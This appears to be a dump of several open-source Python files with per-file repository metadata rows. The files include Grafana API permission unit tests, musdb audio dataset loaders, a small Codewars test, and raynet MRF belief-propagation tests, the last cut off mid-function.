model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(
return_value=dict({"message": "Datasource permissions disabled"})
)
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.disable_datasource_permissions(1))
def test_disable_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.disable_datasource_permissions(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_disable_datasource_permissions_disable_not_possible(
self, call_the_api_mock
):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.disable_datasource_permissions(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_permissions(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"datasourceId": "Test"}))
call_the_api_mock.return_value = mock
self.assertEqual(
dict({"datasourceId": "Test"}), datasource.get_datasource_permissions(1)
)
def test_get_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_permissions(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_permissions_no_datasource_permissions_available(
self, call_the_api_mock
):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_permissions(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_add_datasource_permissions(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Datasource permission added"}))
call_the_api_mock.return_value = mock
self.assertEqual(
None, datasource.add_datasource_permissions(1, dict({"test": "test"}))
)
def test_add_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.add_datasource_permissions(0, dict())
@patch("src.grafana_api.api.Api.call_the_api")
def test_add_datasource_permissions_permission_add_not_possible(
self, call_the_api_mock
):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.add_datasource_permissions(1, dict({"test": "test"}))
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_permissions(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(
return_value=dict({"message": "Datasource permission removed"})
)
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.delete_datasource_permissions(1, 1))
def test_delete_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.delete_datasource_permissions(0, 1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_permissions_delete_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.delete_datasource_permissions(1, 1)
| 39.087037 | 88 | 0.697967 | 2,542 | 21,107 | 5.471676 | 0.028324 | 0.048314 | 0.06902 | 0.064419 | 0.968078 | 0.953483 | 0.941405 | 0.928535 | 0.919045 | 0.908836 | 0 | 0.003235 | 0.19458 | 21,107 | 539 | 89 | 39.159555 | 0.814941 | 0 | 0 | 0.692308 | 0 | 0 | 0.076183 | 0.054579 | 0 | 0 | 0 | 0 | 0.124668 | 1 | 0.124668 | false | 0 | 0.01061 | 0 | 0.137931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3da4b20133d96b74e66d0da8f82e2025b544c943 | 103 | py | Python | homeassistant/components/frontend/mdi_version.py | instantchow/home-assistant | 6797365d4fd74328a0c9e961f652cfb37f48bc7d | [
"MIT"
] | null | null | null | homeassistant/components/frontend/mdi_version.py | instantchow/home-assistant | 6797365d4fd74328a0c9e961f652cfb37f48bc7d | [
"MIT"
] | null | null | null | homeassistant/components/frontend/mdi_version.py | instantchow/home-assistant | 6797365d4fd74328a0c9e961f652cfb37f48bc7d | [
"MIT"
] | null | null | null | """DO NOT MODIFY. Auto-generated by update_mdi script."""
VERSION = "e85dc66e1a0730e44f79ed11501cd79a"
| 34.333333 | 57 | 0.786408 | 11 | 103 | 7.272727 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215054 | 0.097087 | 103 | 2 | 58 | 51.5 | 0.645161 | 0.495146 | 0 | 0 | 1 | 0 | 0.695652 | 0.695652 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3da8c9fefbc02f0574644b6d491b6432e543733c | 238 | py | Python | Codewars/8kyu/get-nth-even-number/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/8kyu/get-nth-even-number/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/8kyu/get-nth-even-number/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
Test.describe('Basic tests')
Test.assert_equals(nth_even(1), 0)
Test.assert_equals(nth_even(2), 2)
Test.assert_equals(nth_even(3), 4)
Test.assert_equals(nth_even(100), 198)
Test.assert_equals(nth_even(1298734), 2597466)
| 26.444444 | 46 | 0.764706 | 43 | 238 | 4 | 0.44186 | 0.290698 | 0.465116 | 0.552326 | 0.668605 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131222 | 0.071429 | 238 | 8 | 47 | 29.75 | 0.647059 | 0.058824 | 0 | 0 | 0 | 0 | 0.04955 | 0 | 0 | 0 | 0 | 0 | 0.833333 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3db10460de291f312c4ec5cac23bc86109a6fde6 | 10,507 | py | Python | data/datasets.py | ws-choi/Conditioned-U-Net-pytorch | 1335d2b858565bc15eb795f3cc132409ecc96561 | [
"MIT"
] | 7 | 2020-08-11T01:06:43.000Z | 2021-11-22T12:36:04.000Z | data/datasets.py | ws-choi/Conditioned-U-Net-pytorch | 1335d2b858565bc15eb795f3cc132409ecc96561 | [
"MIT"
] | null | null | null | data/datasets.py | ws-choi/Conditioned-U-Net-pytorch | 1335d2b858565bc15eb795f3cc132409ecc96561 | [
"MIT"
] | 1 | 2021-05-26T01:41:51.000Z | 2021-05-26T01:41:51.000Z | import torch
from torch.utils.data import Dataset
import numpy as np
import musdb
from tqdm import tqdm
class MusdbLoader(object):
def __init__(self, musdb_root='data/musdb18_wav/', is_wav=True):
self.musdb_train = musdb.DB(root=musdb_root, subsets="train", split='train', is_wav=is_wav)
self.musdb_valid = musdb.DB(root=musdb_root, subsets="train", split='valid', is_wav=is_wav)
self.musdb_test = musdb.DB(root=musdb_root, subsets="test", is_wav=is_wav)
assert (len(self.musdb_train) > 0)
class MusdbTrainSet(Dataset):
def __init__(self, musdb_train, n_fft=2048, hop_length=1024, num_frame=64, target_names=None, cache_mode=True,
dev_mode=False):
self.musdb_train = musdb_train
self.window_length = hop_length * (num_frame - 1)
self.lengths = [track.samples for track in self.musdb_train]
self.source_names = ['vocals', 'drums', 'bass', 'other'] # == self.musdb_train.targets_names[:-2]
if target_names is None:
self.target_names = self.source_names
else:
self.target_names = target_names
self.num_tracks = len(self.musdb_train)
# development mode
if dev_mode:
self.num_tracks = 1
self.lengths = self.lengths[:1]
self.cache_mode = cache_mode
if cache_mode:
self.cache_dataset()
def cache_dataset(self):
self.cache = {}
print('cache audio files.')
for idx in tqdm(range(self.num_tracks)):
self.cache[idx] = {}
for source in self.source_names:
self.cache[idx][source] = self.musdb_train[idx].targets[source].audio.astype(np.float32)
def __len__(self):
return sum([length // self.window_length for length in self.lengths]) * len(self.target_names)
def __getitem__(self, whatever):
source_sample = {target: self.get_random_audio_sample(target) for target in self.source_names}
rand_target = np.random.choice(self.target_names)
mixture = sum(source_sample.values())
target = source_sample[rand_target]
condition_input = np.zeros(len(self.target_names), dtype=np.float32)
condition_input[self.target_names.index(rand_target)] = 1.
return [torch.from_numpy(output) for output in [mixture, target, condition_input]]
def get_random_audio_sample(self, target_name):
return self.get_audio_sample(np.random.randint(0, self.num_tracks), target_name)
def get_audio_sample(self, idx, target_name):
length = self.lengths[idx] - self.window_length
start_position = np.random.randint(length)
return self.get_audio(idx, target_name, start_position, self.window_length)
def get_audio(self, idx, target_name, pos=0, length=None):
if self.cache_mode:
track = self.cache[idx][target_name]
else:
track = self.musdb_train[idx].targets[target_name].audio.astype(np.float32)
return track[pos:pos + length] if length is not None else track[pos:]
class MusdbTestSet(Dataset):
def __init__(self, musdb_test, n_fft=2048, hop_length=1024, num_frame=64, target_names=None, cache_mode=True,
dev_mode=False):
self.hop_length = hop_length
self.musdb_test = musdb_test
self.window_length = hop_length * (num_frame - 1)
self.true_samples = self.window_length - 2 * self.hop_length
self.lengths = [track.samples for track in self.musdb_test]
self.source_names = ['vocals', 'drums', 'bass', 'other'] # == self.musdb_train.targets_names[:-2]
if target_names is None:
self.target_names = self.source_names
else:
self.target_names = target_names
self.num_tracks = len(self.musdb_test)
# development mode
if dev_mode:
self.num_tracks = 4
self.lengths = self.lengths[:4]
import math
num_chunks = [math.ceil(length / self.true_samples) for length in self.lengths]
self.chunk_idx = [sum(num_chunks[:i + 1]) for i in range(self.num_tracks)]
self.cache_mode = cache_mode
if cache_mode:
self.cache_dataset()
def cache_dataset(self):
self.cache = {}
print('cache audio files.')
for idx in tqdm(range(self.num_tracks)):
self.cache[idx] = {}
self.cache[idx]['linear_mixture'] = self.musdb_test[idx].targets['linear_mixture'].audio.astype(
np.float32)
def __len__(self):
return self.chunk_idx[-1] * len(self.target_names)
def __getitem__(self, idx):
target_offset = idx % len(self.target_names)
idx = idx // len(self.target_names)
target_name = self.target_names[target_offset]
mixture, mixture_idx, offset = self.get_mixture_sample(idx)
input_condition = np.zeros(len(self.target_names), dtype=np.float32)
input_condition[target_offset] = 1.
mixture, input_condition = [torch.from_numpy(output) for output in [mixture, input_condition]]
window_offset = offset // self.true_samples
return mixture, mixture_idx, window_offset, input_condition, target_name
def get_mixture_sample(self, idx):
mixture_idx, start_pos = self.idx_to_track_offset(idx)
length = self.true_samples
left_padding_num = right_padding_num = self.hop_length
mixture_length = self.lengths[mixture_idx]
if start_pos + length > mixture_length: # last
right_padding_num += self.true_samples - (mixture_length - start_pos)
length = None
mixture = self.get_audio(mixture_idx, 'linear_mixture', start_pos, length)
mixture = np.concatenate((np.zeros((left_padding_num, 2), dtype=np.float32), mixture,
np.zeros((right_padding_num, 2), dtype=np.float32)), 0)
return mixture, mixture_idx, start_pos
def idx_to_track_offset(self, idx):
for mixture_idx, last_chunk in enumerate(self.chunk_idx):
if idx < last_chunk:
if mixture_idx != 0:
offset = (idx - self.chunk_idx[mixture_idx - 1]) * self.true_samples
else:
offset = idx * self.true_samples
return mixture_idx, offset
return None, None
def get_audio(self, idx, target_name, pos=0, length=None):
if self.cache_mode and target_name == 'linear_mixture':
track = self.cache[idx][target_name]
else:
track = self.musdb_test[idx].targets[target_name].audio.astype(np.float32)
return track[pos:pos + length] if length is not None else track[pos:]
class MusdbValidSet(Dataset):
def __init__(self, musdb_valid, n_fft=2048, hop_length=1024, num_frame=64, target_names=None, cache_mode=True,
dev_mode=False):
self.hop_length = hop_length
self.musdb_valid = musdb_valid
self.window_length = hop_length * (num_frame - 1)
self.true_samples = self.window_length - 2 * self.hop_length
self.lengths = [track.samples for track in self.musdb_valid]
self.source_names = ['vocals', 'drums', 'bass', 'other'] # == self.musdb_train.targets_names[:-2]
if target_names is None:
self.target_names = self.source_names
else:
self.target_names = target_names
self.num_tracks = len(self.musdb_valid)
# development mode
if dev_mode:
self.num_tracks = 1
self.lengths = self.lengths[:1]
import math
num_chunks = [math.ceil(length / self.true_samples) for length in self.lengths]
self.chunk_idx = [sum(num_chunks[:i + 1]) for i in range(self.num_tracks)]
self.cache_mode = cache_mode
if cache_mode:
self.cache_dataset()
def cache_dataset(self):
self.cache = {}
print('cache audio files.')
for idx in tqdm(range(self.num_tracks)):
self.cache[idx] = {}
for source in self.source_names + ['linear_mixture']:
self.cache[idx][source] = self.musdb_valid[idx].targets[source].audio.astype(np.float32)
def __len__(self):
return self.chunk_idx[-1] * len(self.target_names)
def __getitem__(self, idx):
target_offset = idx % len(self.target_names)
idx = idx // len(self.target_names)
target_name = self.target_names[target_offset]
mixture_idx, start_pos = self.idx_to_track_offset(idx)
length = self.true_samples
left_padding_num = right_padding_num = self.hop_length
mixture_length = self.lengths[mixture_idx]
if start_pos + length > mixture_length: # last
right_padding_num += self.true_samples - (mixture_length - start_pos)
length = None
mixture = self.get_audio(mixture_idx, 'linear_mixture', start_pos, length)
target = self.get_audio(mixture_idx, target_name, start_pos, length)
mixture = np.concatenate((np.zeros((left_padding_num, 2), dtype=np.float32), mixture,
np.zeros((right_padding_num, 2), dtype=np.float32)), 0)
target = np.concatenate((np.zeros((left_padding_num, 2), dtype=np.float32), target,
np.zeros((right_padding_num, 2), dtype=np.float32)), 0)
input_condition = np.zeros(len(self.target_names), dtype=np.float32)
input_condition[target_offset] = 1.
mixture, input_condition, target = [torch.from_numpy(output) for output in [mixture, input_condition, target]]
window_offset = start_pos // self.true_samples
return mixture, mixture_idx, window_offset, input_condition, target_name, target
def idx_to_track_offset(self, idx):
for i, last_chunk in enumerate(self.chunk_idx):
if idx < last_chunk:
if i != 0:
offset = (idx - self.chunk_idx[i - 1]) * self.true_samples
else:
offset = idx * self.true_samples
return i, offset
return None, None
def get_audio(self, idx, target_name, pos=0, length=None):
if self.cache_mode:
track = self.cache[idx][target_name]
else:
track = self.musdb_valid[idx].targets[target_name].audio.astype(np.float32)
return track[pos:pos + length] if length is not None else track[pos:]
| 38.914815 | 118 | 0.639478 | 1,395 | 10,507 | 4.551971 | 0.08172 | 0.050236 | 0.047244 | 0.028346 | 0.807244 | 0.780945 | 0.755276 | 0.750236 | 0.717638 | 0.699528 | 0 | 0.012926 | 0.256305 | 10,507 | 269 | 119 | 39.05948 | 0.799718 | 0.016846 | 0 | 0.632653 | 0 | 0 | 0.023157 | 0 | 0 | 0 | 0 | 0 | 0.005102 | 1 | 0.107143 | false | 0 | 0.035714 | 0.020408 | 0.244898 | 0.015306 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3def77f0f65c19ed8863a45e66c01746e1dad288 | 23 | py | Python | filterv/__init__.py | ParthikB/filterv | 6a79296fb95ed0111d591eb77faab475723318b7 | [
"MIT"
] | 1 | 2020-08-05T11:55:46.000Z | 2020-08-05T11:55:46.000Z | filterv/__init__.py | ParthikB/filterv | 6a79296fb95ed0111d591eb77faab475723318b7 | [
"MIT"
] | null | null | null | filterv/__init__.py | ParthikB/filterv | 6a79296fb95ed0111d591eb77faab475723318b7 | [
"MIT"
] | null | null | null | import filterv.filter
| 11.5 | 22 | 0.826087 | 3 | 23 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 23 | 1 | 23 | 23 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9ab2dc11034527cdd02d3a02393be7c06c760edc | 27 | py | Python | tests/test_start.py | PerU-MoNsteR/EduRobot | 9f473eb6a0f193ceaf47f501d67b8780cf770b2f | [
"MIT"
] | 3 | 2020-12-12T02:33:24.000Z | 2020-12-13T03:42:23.000Z | tests/test_start.py | PerU-MoNsteR/EduRobot | 9f473eb6a0f193ceaf47f501d67b8780cf770b2f | [
"MIT"
] | null | null | null | tests/test_start.py | PerU-MoNsteR/EduRobot | 9f473eb6a0f193ceaf47f501d67b8780cf770b2f | [
"MIT"
] | 1 | 2020-12-12T03:02:44.000Z | 2020-12-12T03:02:44.000Z | def test_start():
pass
| 9 | 17 | 0.62963 | 4 | 27 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.259259 | 27 | 2 | 18 | 13.5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
9aedb71c87fc60b753cbd97005aa2d0abe4b1934 | 41 | py | Python | test/fixtures/python/analysis/c/__init__.py | matsubara0507/semantic | 67899f701abc0f1f0cb4374d8d3c249afc33a272 | [
"MIT"
] | 8,844 | 2019-05-31T15:47:12.000Z | 2022-03-31T18:33:51.000Z | test/fixtures/python/analysis/c/__init__.py | matsubara0507/semantic | 67899f701abc0f1f0cb4374d8d3c249afc33a272 | [
"MIT"
] | 401 | 2019-05-31T18:30:26.000Z | 2022-03-31T16:32:29.000Z | test/fixtures/python/analysis/c/__init__.py | matsubara0507/semantic | 67899f701abc0f1f0cb4374d8d3c249afc33a272 | [
"MIT"
] | 504 | 2019-05-31T17:55:03.000Z | 2022-03-30T04:15:04.000Z | from . import utils
print(utils.to_s())
| 10.25 | 19 | 0.707317 | 7 | 41 | 4 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 41 | 3 | 20 | 13.666667 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
9afdbcf5bfe052427b27f1be44a3bbc96f1f5db4 | 126 | py | Python | api_project_generator/helpers/git_repo.py | gustcorrea/api-project-generator | efb0f94f66ecd6e6aba0abb04aa366c030bdf885 | [
"MIT"
] | null | null | null | api_project_generator/helpers/git_repo.py | gustcorrea/api-project-generator | efb0f94f66ecd6e6aba0abb04aa366c030bdf885 | [
"MIT"
] | null | null | null | api_project_generator/helpers/git_repo.py | gustcorrea/api-project-generator | efb0f94f66ecd6e6aba0abb04aa366c030bdf885 | [
"MIT"
] | null | null | null | from pathlib import Path
from git import Repo
def init_repository(path: Path) -> Repo:
return Repo.init(path)
| 14 | 41 | 0.68254 | 18 | 126 | 4.722222 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246032 | 126 | 8 | 42 | 15.75 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
b10381c9309212170ec699c814c617e4426b4242 | 936 | py | Python | cookbook/example.py | benmaier/vaccontrib | 1be75e049d3069ba465e7779e850c2e2504daae9 | [
"MIT"
] | 1 | 2021-12-14T15:51:19.000Z | 2021-12-14T15:51:19.000Z | cookbook/example.py | benmaier/vaccontrib | 1be75e049d3069ba465e7779e850c2e2504daae9 | [
"MIT"
] | null | null | null | cookbook/example.py | benmaier/vaccontrib | 1be75e049d3069ba465e7779e850c2e2504daae9 | [
"MIT"
] | null | null | null | from vaccontrib.io import (
get_contact_matrix,
get_vaccine_fractions,
get_fraction_vaccinated,
get_population_sizes,
get_susceptibility_reduction,
get_transmissibility_reduction,
get_relative_infection_rate,
get_relative_recovery_rate,
get_disease_free_state,
)
functions = [
get_contact_matrix,
get_vaccine_fractions,
get_fraction_vaccinated,
get_population_sizes,
get_susceptibility_reduction,
get_transmissibility_reduction,
get_relative_infection_rate,
get_relative_recovery_rate,
get_disease_free_state,
]
for f in functions:
print()
print(f.__name__)
print(f())
| 31.2 | 51 | 0.535256 | 75 | 936 | 6.066667 | 0.386667 | 0.105495 | 0.07033 | 0.083516 | 0.852747 | 0.852747 | 0.852747 | 0.852747 | 0.852747 | 0.852747 | 0 | 0 | 0.428419 | 936 | 29 | 52 | 32.275862 | 0.850467 | 0 | 0 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.038462 | 0.115385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b12535067005480d5db27dc8492c9c22f0ce8677 | 16,094 | py | Python | tests/test_mrf.py | paschalidoud/raynet | bf468dadddaf30da9cf5b1ecdfbcf4f161476242 | [
"MIT"
] | 76 | 2018-04-08T04:33:26.000Z | 2021-09-24T15:05:45.000Z | tests/test_mrf.py | paschalidoud/raynet | bf468dadddaf30da9cf5b1ecdfbcf4f161476242 | [
"MIT"
] | 8 | 2018-08-24T16:56:19.000Z | 2021-04-11T08:41:31.000Z | tests/test_mrf.py | paschalidoud/raynet | bf468dadddaf30da9cf5b1ecdfbcf4f161476242 | [
"MIT"
] | 18 | 2018-06-28T13:23:22.000Z | 2021-03-29T03:17:39.000Z | import numpy as np
import matplotlib
matplotlib.use("agg")
import matplotlib.pyplot as plt
import unittest
from raynet.common.generation_parameters import GenerationParameters
from raynet.mrf.bp_inference import get_bp_backend
from raynet.mrf.mrf_np import compute_occupancy_probabilities
from raynet.ray_marching.ray_tracing import voxel_traversal
def get_generation_params(grid_shape, max_number_of_marched_voxels):
return GenerationParameters(
grid_shape=grid_shape,
max_number_of_marched_voxels=max_number_of_marched_voxels
)
def append_to_backends(grid_shape, N, M, batch_size=1):
BACKENDS = [] # Holds a list of all available backends
common_params = dict(
generation_params=get_generation_params(grid_shape, M),
bp_iterations=3
)
BACKENDS.append(get_bp_backend("numpy", **common_params))
BACKENDS.append(get_bp_backend("tf", N=N, **common_params))
BACKENDS.append(get_bp_backend("cuda", batch_size=batch_size, **common_params))
return BACKENDS
class TestMRF(unittest.TestCase):
def test_2d_single_ray(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((10, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
ray_start = np.array([0., 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6., 0.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices,
ray_start,
ray_end
)
# We assume that the (2, 2) voxel is occupied, thus we will give a
# higher probability
S = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0]],
dtype=np.float32
)
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 1, 10)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S,
ray_voxels_indices.reshape(1, 10, 3),
np.ones(1, dtype=np.int32) * Nr,
np.random.random((1, 10)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
)
# The (2, 2) voxel should have the higher probability
max_idx = np.where(occupancy_probabilities == occupancy_probabilities.max())
self.assertEqual(max_idx[0][0], 2)
self.assertEqual(max_idx[1][0], 2)
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_1ray.png" % (i,))
plt.close()
def test_2d_single_2rays(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((2, 10, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((2, 10), dtype=np.float32)
ray_start = np.array([0., 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6., 0.5, 0.5], dtype=np.float32)
ray_voxel_count = []
Nr = voxel_traversal(
bbox,
grid_shape,
ray_voxels_indices[0, :, :],
ray_start,
ray_end
)
ray_voxel_count.append(Nr)
# We assume that the (2, 2) voxel is occupied, thus we will give a
# higher probability
S1 = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0]],
dtype=np.float32
)
S_total[0, :] = S1
ray_start = np.array([6., 5.5, 0.5], dtype=np.float32)
ray_end = np.array([0.0, 2.5, 0.5], dtype=np.float32)
Nr = voxel_traversal(bbox, grid_shape, ray_voxels_indices[1, :, :], ray_start, ray_end)
ray_voxel_count.append(Nr)
# We assume that the (4, 3) voxel is occupied, thus we will give a
# higher probability
S2 = np.array(
[[0.075, 0.075, 0.075, 0.4, 0.075, 0.075, 0.075, 0.075, 0.075, 0.0]],
dtype=np.float32
)
S_total[1, :] = S2
# Test for the different backends
BACKENDS = append_to_backends(grid_shape, 2, 10, batch_size=2)
for i, bp in enumerate(BACKENDS):
ray_to_occupancy_accumulated_pon, ray_to_occupancy_messages_pon = bp.update_bp_messages(
S_total,
ray_voxels_indices,
np.stack(ray_voxel_count).astype(np.int32),
np.random.random((2, 10)).astype(np.float32)
)
occupancy_probabilities = compute_occupancy_probabilities(
ray_to_occupancy_accumulated_pon
).T
# Find which one of the two occupied voxels has the larger probability
max_prob = [occupancy_probabilities[0, 4, 3]
if occupancy_probabilities[0, 4, 3] > occupancy_probabilities[0, 2, 2] else occupancy_probabilities[0, 2, 2]][0]
for i in range(6):
for j in range(6):
self.assertGreaterEqual(max_prob, occupancy_probabilities[0, i, j])
fig = plt.figure()
plt.imshow(occupancy_probabilities[:, :, 0].T)
plt.gca().invert_yaxis()
plt.colorbar()
plt.savefig("/tmp/bp%d_occupancy_probability_2rays.png" % (i,))
plt.close()
def test_2d_single_2rays_2example(self):
# Define a 2d grid of size 6x6
bbox = np.array([0, 0, 0, 6, 6, 1], dtype=np.float32)
grid_shape = np.array([6, 6, 1], dtype=np.int32)
ray_voxels_indices = np.empty((2, 11, 3), dtype=np.int32)
ray_voxels_indices.fill(0)
S_total = np.zeros((2, 11), dtype=np.float32)
ray_start = np.array([0., 3.5, 0.5], dtype=np.float32)
ray_end = np.array([6., 0.5, 0.5], dtype=np.float32)
